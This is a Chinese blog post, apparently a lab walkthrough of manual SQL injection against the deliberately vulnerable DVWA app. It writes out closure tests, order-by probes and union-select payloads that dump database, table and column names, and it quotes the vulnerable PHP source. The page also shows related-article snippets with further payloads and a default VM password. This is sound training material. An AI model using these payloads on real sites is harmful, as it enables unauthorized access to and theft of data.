owaspbwa-DVWA-SQL注入

最新推荐文章于 2024-06-26 22:17:06 发布
原创 最新推荐文章于 2024-06-26 22:17:06 发布 · 1.5k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

文章目录

前言:

DVWA靶场的sql注入有三个难度等级,通过黑盒注入结合代码审计的形式做一下这个靶场
知识储备:
需要有php、mysql的基础知识,了解sql注入的基本原理

环境

使用VM加载靶机的.ova文件,VM的虚拟机都是可以加载的。
靶机百度网盘下载链接:
https://pan.baidu.com/s/1KaXy5KnXP7Td8s-3zPgalw 密码: jqq7

对于有回显的注入一般的思路就是:拼接sql语句使得查询结果可以显示在页面上。最终得到表名,字段名等敏感数据。

low等级难度

注入过程:
输入合法参数1 ,页面正常输出,有回显位,输入的内容在url中可见,说明是get类型传参,参数是id

在这里插入图片描述

查看闭合方式

1 and 1=2 不报错,页面内容正常显示,不是整型闭合
在这里插入图片描述

1' and 1=2报错 说明'导致语法错误
在这里插入图片描述
1' and 1=2 --+ ,页面无内容,但语法正确
在这里插入图片描述
即闭合方式:'
在这里插入图片描述
对于有回显的情况,尝试报错注入的思路

查看字段数

1' order by 2 页面正常
在这里插入图片描述
1' order by 3 --+//页面报错
在这里插入图片描述

得到字段数为:2

union查询 库-表-字段

查询库名和数据库用户名:1.1' union select user(),database() --+
在这里插入图片描述

查询当前数据库的所有表

1.1'union select 1,group_concat(table_name) from information_schema.tables  where table_schema=database()--+

在这里插入图片描述
查看users表中的所有字段

1.1'union select 1,group_concat(column_name) from information_schema.columns  where table_name='users'--+

在这里插入图片描述

源码分析:


<?php    

if(isset($_GET['Submit'])){
   
   
    
    // Retrieve data
    
    $id = $_GET['id']; //没有对$id 做任何的过滤与检查

    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
    $result = mysql_query($getid) or die('<pre>' . mysql_error()
最低0.47元/天 解锁文章
debaowang
关注
【愚公系列】2023年05月 网络安全高级班 066.WEB渗透与安全(SQL注入漏洞-SQLmap注入
时光隧道
05-20 8392
SQL注入漏洞是一种常见的Web应用程序安全漏洞,攻击者通过在输入数据中插入恶意的SQL代码,使应用程序接受并执行其代码,从而获得不应该被揭示的敏感信息。SQLmap是一种流行的自动化工具,用于检测和利用Web应用程序中的SQL注入漏洞。它通过发送各种恶意有效载荷来测试目标网站是否存在SQL注入漏洞,并自动获取目标数据库的信息。最强大的SQL注入渗透测试工具基于Python编写,跨平台,基于命令行操作集成从注入探测到漏洞利用的整套渗透测试功能。
SQL注入攻击及防御 手动注入+sqlmap自动化注入实战(网络安全学习12)
Until_U的博客
07-05 6358
1 项目实验环境 测试渗透机:kali_linux-2020 链接:https://pan.baidu.com/s/1apN96nIcs1Fyx8YmFs24Xg 提取码:32ve 目标靶机:owasp_Broken_Web_Apps 链接:https://pan.baidu.com/s/1CMJ2aERmDGlXXkhUmjDmtA 提取码:9zsj 2 SQL注入概述 2.1 SQL注入简介 在owasp年度top 10安全问题中,注入高居榜首。SQL注入攻击指的是通过构建特殊..
使用sqlmap对OWASP靶机进行sql注入练习操作实例展示
WEL测试
03-30 1万+
前置条件 靶机:OWASP_Broken_Web_Apps_VM_0.94 靶机IP:192.168.88.138 初始密码是:root/owaspbwa kali安装的镜像为:kali-linux-2019.1a-amd64.iso KaliIP为:192.168.88.132 使用sqlmap进行sql注入 网站为:http://192.168.88.138 故意在输入...
dvwa——sql注入
qq_45487671的博客
05-26 2763
SQL注入攻击实验 1.实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 2.实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 3.实验过程描述 1、判断是否存在SQL注入点。 id值输入1,发现正常显示 输入
OWASPBWA的搭建及简单学习文件上传漏洞
小城的博客
11-08 3733
OWASPBWA的搭建及学习 我直接将我使用的OWASPBWA的链接地址发出来 owasp下载链接:https://jaist.dl.sourceforge.net/project/owaspbwa/1.2/OWASP_Broken_Web_Apps_VM_1.2.7z 将这个链接复制到迅雷下载即可,大概是1.7G,网速快的话很快就下好了。 下载完之后直接解压,然后点击vm右上角的文件直接选择打开这个文件夹即可使用 * * 进入机子后,输入ip a 查看机子的ip地址 得到靶机的地址后,我们可以在浏览器
Web安全渗透OWASP-DVWA-SQL注入攻击
lx1315998513的博客
12-13 2911
SQL注入攻击 在owasp年度top10安全问题中,注入高居榜首,SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者索要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 一、回顾SQL语句 1.登陆owasp mysql -uroot -powaspbwa -u账户,-p密码...
owaspbwa筆記
weixin_34409822的博客
11-18 658
2.1.1 HTTP 基础知识(Http Basics) .............................................9 HTTP 是如何工作的呢?所有的 HTTP 传输都要遵循同样的通用格式(需要使用 IEWatch 或 WebScarab 类插件协助进行学习)。每个客户端的请求和服务端的响应都有三个部分:请 求或响应行、一个报头部分和实体部分。客户端以如下方...
【安全渗透】sql注入
wy233333的博客
04-09 1033
目录1. sql 注入1.1 sql 注入 介绍1.2 sql 注入 原理1.3 sql 注入 危害1.4 sql 注入 实现方式2. 环境搭建2.1 vmware虚拟机软件2.2 靶机(学习使用项目环境)2.3 渗透机(学习攻击 sql 注入环境)3. sql语句基本操作(mysql为例)3.1 基本 sql 库操作语句3.2 查询语句3.3 联合查询 union3.4 特殊数据库 1. sql...
OWASP BWA
微信公众号:码奋
04-13 5348
​ (你的世界是个什么样的世界?你说,我们倾听!) ----------------- OWASP BWA OWASP BWA(破碎的Web应用程序)是一个Ubuntu网站(Linux发行版),其中有多个Web应用程序故意存在漏洞,正如我们在“实用漏洞Web应用程序调查”一文中提到的那样。是虚拟机映像。 OWASP BWA(Broken Web Apps)是由国际信息安全领域著名...
4.sql注入攻击(OWASP实战训练)
吾名招财的博客
06-26 1150
sql注入攻击
SQL注入实战
11-20
安全大神冰河亲自制作SQL注入入门级案例,非常适合初学者研究实践SQL注入,更好的提升自身对SQL 漏洞的注入能力和对数据库安全的认识。
网络安全攻防的环境配置(owaspbwa
热门推荐
vergilben的学习日记
04-08 2万+
网络安全攻防的环境配置 之前有朋友留言说介绍一下我常用的环境,在学习信息安全的过程中我们需要环境去自己练习,其中web方面的可以用复现漏洞的方式来练习。下面介绍三种自己用的练习方法(第三种较长): 合天网安实验室 最初我开始学习的时候用的就是合天网安实验室,里面的实验偏基础,倾向于让你了解原理,适合小白入门,唯一不足的是价格有点贵,有些实验你要存好长时间的合氏币,在我以前的博客里许多用的是合天...
owaspbwa tickets
weixin_33728268的博客
02-17 1040
  owaspbwa tickets   来源  https://sourceforge.net/p/owaspbwa/tickets/   192 SQL Injection in pic_id parameter Peruggia High 191 1 AWStats Medium 190 GetBoo reflected XSS in http:/​/​owaspbwa/​getboo/...
靶机OWASPBWA下载及安装
weixin_45798017的博客
03-31 6338
下载路径:https://sourceforge.net/projects/owaspbwa/files/
dvwa之php mysql_SQL注入DVWA平台测试mysql注入
weixin_42303461的博客
01-19 241
今天主要针对mysql常用注入语句进行测试。测试环境与工具:测试平台:DVWA,下载地址:http://down.51cto.com/data/875088,也可下载metaspolit-table2虚拟机,里面已经部署好了dvwa.。渗透工具:burpsuite-1.4.07下载地址:http://down.51cto.com/data/875103首先我们介绍下DVWA和Burpsuite,D...
owasp top10 之 sql注入
weixin_48951041的博客
05-31 607
sql 注入:具体语句:查库名:select database();猜字段数:order by 3;暴库select group_concat(schema_name) from information_schema.schemata爆表select group_concat(table_name) from information_schema.tables where table_schema = database() %23爆字段select group_concat(column_name) fro
web安全学习笔记(一) OWASPBWA--靶机搭建
qycc3391的博客
02-14 8882
为了学习web安全,需要搭建一个用来攻击的靶机,OWASP,Open Web Application Security Project, 提供了许多用于学习安全学习的项目。 这里使用The Broken Web Applications (BWA) Project, 提供一个虚拟机的克隆,包含了含有漏洞的网站,可以使用vmware workstation 打开。此项目的优点是,直接提供了虚拟机的克...
渗透测试演练工具(VM)OWASPBWA1.0 RC2
梦想专栏
08-22 3112
OWASP Broken Web Applications Project是OWASP出品的一款基于虚拟机的渗透测试演练工具(VM),由于包含了诸多供测试的安全弱点,所以强烈建议在host only或NAT的虚拟机网络模式下使用。   OWASPBWA 1.0rc2版本主要更新: 增加了新的应用: wavsep (http://code.google.com/p/wavsep/) 升级了W...
在kali上使用virtualBox搭建OWASPbwa靶机
jelly
02-20 3414
前言 最近学习使用kali系统,在电脑上安装kali+windows10的双系统,在学习了一些常规漏洞后,打算在kali系统中利用virtualBox搭建一个靶机,用于实战练习。 #使用环境 宿主主机:kali linux2019.11 使用软件:virtualbox 6.1.2_Debian r135662 靶机:OWASPbwa2.0 具体步骤 1.安装virtualbox 在 /etc/ap...
sql注入-dvwa
最新发布
12-31
### SQL注入攻击与防御方法 #### 攻击方式 在DVWA (Damn Vulnerable Web Application) 中,SQL 注入漏洞存在于多个功能模块内。当应用程序未能正确过滤用户输入并将其直接拼接到SQL查询语句中时,就可能发生SQL注入。 例如,在登录表单处尝试提交如下用户名和密码组合: ```sql ' OR '1'='1 ``` 这将导致数据库执行条件始终成立的查询[^1]。 对于更复杂的场景,可以利用布尔盲注技术来逐位猜解出隐藏的信息。通过发送精心构造的数据包给服务器,并观察响应时间或页面返回内容的变化来进行判断[^2]。 #### 防御措施 为了防止SQL注入的发生,应该采取以下几种主要策略: - **参数化查询**:使用预编译语句代替字符串连接构建SQL命令。这样即使恶意代码被插入到变量之中也不会改变原有逻辑结构。 Python中的`sqlite3`库提供了这样的接口: ```python import sqlite3 conn = sqlite3.connect('example.db') cursor = conn.cursor() user_input = "some input" query = "SELECT * FROM users WHERE username=?;" cursor.execute(query, (user_input,)) ``` - **存储过程调用**:把业务操作封装成存储过程的形式,在应用层只负责传递必要的参数而不涉及具体语法细节。 - **最小权限原则**:确保用于访问数据库的应用程序账户仅具有完成其工作所需的最低限度权利;比如读取特定表格而不是整个数据库的所有对象。 - **输入验证**:严格限定允许接收字符集范围内的数据项长度以及格式等属性,拒绝不符合规则的内容进入后续处理流程之前就被拦截下来[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值